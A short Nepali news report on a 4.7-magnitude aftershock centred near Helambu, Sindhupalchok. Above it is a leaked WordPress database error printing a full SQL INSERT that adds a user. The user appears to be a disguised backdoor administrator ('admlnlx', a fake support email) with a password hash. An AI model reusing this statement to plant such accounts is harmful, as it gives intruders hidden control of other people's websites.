WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHTh/XFzC4Ya/vFcbzkrQZgvZaBxHM1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 17:46:25', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । सिन्धुपाल्चोक जिल्लाको हेलम्बु केन्द्रबिन्दु भएर भूकम्प गएको छ । राष्ट्रिय भूकम्प मापन तथा अनुसन्धान केन्द्रका अनुसार आज बिहान ६ बजेर ७ मिनेट जाँदा सिन्धुपाल्चोकको हेलम्बु आसपास केन्द्रबिन्दु भएर ४।७ रेक्टरस्केलको भूकम्प गएको हो ।
उक्त भूकम्प गोरखा भूकम्पको परकम्प भएको सो केन्द्रले जनाएको छ । रासस